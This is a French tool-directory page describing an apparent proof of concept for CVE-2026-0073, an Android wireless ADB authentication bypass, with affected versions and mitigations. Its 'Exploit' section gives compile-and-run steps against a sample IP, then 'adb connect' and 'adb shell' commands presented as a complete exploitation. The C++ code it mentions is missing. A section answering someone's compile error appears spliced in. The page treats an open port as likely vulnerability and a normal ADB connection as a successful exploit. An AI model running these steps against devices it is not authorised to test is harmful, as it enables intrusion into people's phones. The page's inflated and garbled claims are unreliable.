Skip to content
KitploitKITPLOIT
OutilsBlog
Soumettre
OutilsBlog
Soumettre

Outils de Hacking, PenTest et Cybersécurité pour votre Arsenal de Sécurité !

Kitploit est un répertoire d'outils de hacking, de cybersécurité et de pentesting. Découvrez les dernières mises à jour des projets pour trouver des vulnérabilités, analyser des systèmes, automatiser les tests et renforcer votre sécurité.

··Flux·Contact·Confidentialité·© 2026 Kitploit

Répertoire d'outils

Catégories

Voir toutes les catégories
Loading categories
CVE-2026-0073 — CVE-2026-0073 | Kitploit
Outils/GitHubGitHub/0xblackash/cve-2026-0073
Sécurité AndroidAnalyse des VulnérabilitésExploitationSécurité Sans FilTests d'IntrusionAuthentification
GitHub0xblackash/cve-2026-0073

CVE-2026-0073

CVE-2026-0073

Voir le dépôt
5148il y a 4 moisPas encore vérifié

Populaires

Voir tout →

Découvrez les outils les plus utilisés par notre communauté.

Explorer tous les outils

Parcourez notre collection d'outils

Voir tous les outils →
Partager

🤖 CVE-2026-0073 - Contournement de l'authentification ADB sans fil

ChatGPT Image May 7, 2026, 03_05_19 PM

Critical Android Type


📌 Vue d'ensemble

CVE-2026-0073 est une vulnérabilité critique de contournement d'authentification dans l'ADB sans fil d'Android (daemon adbd).

Un attaquant sur le même réseau peut contourner l'authentification TLS mutuelle et se connecter à l'appareil sans approbation de l'utilisateur ni appariement préalable.

Informations clés

ÉlémentDétails
Identifiant CVECVE-2026-0073
GravitéCritique
Score CVSS8.8
Composant concernéadbd (Android Debug Bridge) - Gestionnaire TLS
TypeContournement d'authentification
ImpactAccès shell à distance (utilisateur shell)
CorrectifBulletin de sécurité Android de mai 2026

🛠 Versions concernées

  • Android 14
  • Android 15
  • Android 16
  • Android 16 QPR2

Corrigé dans : niveau de correctif de sécurité 2026-05-01 et ultérieur.


🎯 Conditions de l'attaque

  • L'appareil cible doit avoir le débogage sans fil activé
  • L'attaquant doit être sur le même réseau Wi-Fi
  • Options de développement activées (courant sur de nombreux appareils)
  • L'appareil a déjà été apparié avec ADB au moins une fois

⚠️ Impact

  • Aucune interaction de l'utilisateur requise
  • L'attaquant peut obtenir un shell ADB complet
  • Peut installer des applications, extraire des données, exécuter des commandes en tant qu'utilisateur shell
  • Peut élever ses privilèges si d'autres vulnérabilités existent
  • Particulièrement dangereux dans les environnements d'entreprise, de développement et de test

🛡️ Atténuation

  • Mettre à jour vers le correctif de sécurité de mai 2026 ou plus récent
  • Désactiver le débogage sans fil lorsqu'il n'est pas utilisé
  • Éviter d'activer l'ADB sans fil sur des réseaux publics/non fiables
  • Utiliser l'ADB USB plutôt que sans fil lorsque c'est possible

🧪 Statut du PoC

  • Des PoC publics sont disponibles
  • La version simple utilise un client ADB modifié avec contournement de certificat
  • Fonctionne en exploitant une faille logique dans adbd_tls_verify_cert()

✅ Correction de votre erreur

L'erreur se produit parce que le fichier CVE-2026-0073-Checker.cpp n'existe pas encore.


Solution étape par étape :

  1. Créez le fichier avec cette commande :
root@kitploit:~
nano CVE-2026-0073-Checker.cpp
  1. Copiez et collez le code complet ci-dessous dans l'éditeur :

  2. Enregistrez et quittez (Ctrl + X → Y → Entrée)

  3. Compilez à nouveau :

root@kitploit:~
g++ -o CVE-2026-0073 CVE-2026-0073-Checker.cpp -lssl -lcrypto -Wall -O2
  1. Exécutez :
root@kitploit:~
./CVE-2026-0073 192.168.1.105

✅ Exploit

Voici exactement ce que vous verrez si le programme C++ fonctionne correctement sur un appareil Android vulnérable :

Sortie attendue en cas de succès :

root@kitploit:~
╔══════════════════════════════════════════════════════════════╗
║                CVE-2026-0073  PoC Checker                    ║
║         Android Wireless ADB Authentication Bypass           ║
╚══════════════════════════════════════════════════════════════╝

Target : 192.168.1.105

[*] Checking 192.168.1.105:5555 → OPEN

[!] Wireless ADB Port is Open!
[!] High chance of being vulnerable to CVE-2026-0073

Next Steps:
   1. adb connect 192.168.1.105:5555
   2. adb shell

Ce que cela signifie :

  • OPEN en vert → Le port ADB est à l'écoute.
  • Le programme a détecté que le débogage sans fil est activé.
  • Cela signifie que l'appareil a de grandes chances d'être exploitable avec CVE-2026-0073.

Prochain vrai test (après avoir exécuté l'outil C++) :

Exécutez ces commandes :

root@kitploit:~
adb connect 192.168.1.105:5555

S'il affiche :

root@kitploit:~
connected to 192.168.1.105:5555

Puis tapez :

root@kitploit:~
adb shell

Vous devriez accéder à l'appareil :

root@kitploit:~
pixel8:/ $ 

C'est une exploitation réussie complète.


⚠️ Avertissement

Ce PoC est uniquement destiné à un usage éducatif et à des tests autorisés.

Vous ne pouvez utiliser cet outil que sur des appareils vous appartenant ou pour lesquels vous avez l'autorisation explicite de tester. Toute utilisation non autorisée est illégale et strictement interdite.

Utilisez-le à vos propres risques. L'auteur n'est pas responsable des dommages ou des conséquences juridiques.


🎯 Conçu avec prudence — À utiliser uniquement sur des appareils autorisés.

Télécharger l’outil